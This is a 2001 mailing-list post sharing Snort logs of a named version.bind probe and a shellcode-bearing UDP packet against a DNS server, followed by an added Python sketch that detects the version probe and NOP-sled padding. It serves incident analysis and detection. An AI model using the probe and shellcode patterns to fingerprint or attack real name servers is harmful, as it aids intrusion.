Security Incidents mailing list archives
Named TSIG exploit ?
From: Mihai Moldovanu <mihaim () PROFM RO>
Date: Mon, 5 Feb 2001 20:19:40 +0200
I found this in the SNORT logs:

[**] IDS278 - SCAN -named Version probe [**]
02/01-09:30:18.672782 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800 len:0x48
141.85.31.233:1024 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
Len: 38
00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 72  .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03        sion.bind.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800 len:0x22A
141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
Len: 520
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The shellcode inside the second packet is pretty strange. Can anyone take a deeper look at it?

Lead programmer,
Mihai Moldovanu (mihaim () profm ro)
WEB: http://tfm.profm.ro/ http://www.developers.ro/
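The two alerts in the log above correspond to two simple payload checks: a CHAOS-class TXT query for version.bind, and a long run of 0x90 bytes in a UDP datagram sent to port 53. The sketch below is an added example, not part of the original post and not Snort's own rule logic; the function names and the 32-byte run threshold are assumptions, the first sample is the 30-byte probe payload from the log, and the second is constructed padding.

```python
import struct

TYPE_TXT, CLASS_CHAOS = 16, 3
NOP, NOP_RUN_THRESHOLD = 0x90, 32  # threshold is an assumption; tune per site

def parse_question(payload: bytes):
    """Return (qname, qtype, qclass) of the first DNS question, or None."""
    if len(payload) < 12:
        return None
    if struct.unpack_from("!H", payload, 4)[0] < 1:  # QDCOUNT
        return None
    labels, pos = [], 12
    while True:
        if pos >= len(payload):
            return None
        length = payload[pos]
        pos += 1
        if length == 0:
            break
        # Reject compression pointers and labels that overrun the datagram.
        if length > 63 or pos + length > len(payload):
            return None
        labels.append(payload[pos:pos + length].decode("ascii", "replace").lower())
        pos += length
    if pos + 4 > len(payload):
        return None
    qtype, qclass = struct.unpack_from("!HH", payload, pos)
    return ".".join(labels), qtype, qclass

def longest_run(payload: bytes, value: int) -> int:
    """Length of the longest run of `value` bytes in the payload."""
    best = cur = 0
    for b in payload:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best

def classify(payload: bytes) -> list:
    """Return the names of the checks that fire on one UDP/53 payload."""
    alerts = []
    if parse_question(payload) == ("version.bind", TYPE_TXT, CLASS_CHAOS):
        alerts.append("named-version-probe")
    if longest_run(payload, NOP) >= NOP_RUN_THRESHOLD:
        alerts.append("x86-nop-sled")
    return alerts

# UDP payload of the first packet in the post's Snort log (30 bytes).
VERSION_PROBE = bytes.fromhex(
    "00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 72"
    "73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03")
# Constructed sample: zeroed 12-byte header followed by NOP padding only.
NOP_PADDED = bytes(12) + bytes([NOP]) * 64
```

Seeing both alerts from the same source address within a short window, as in the log, is a stronger signal than either check alone.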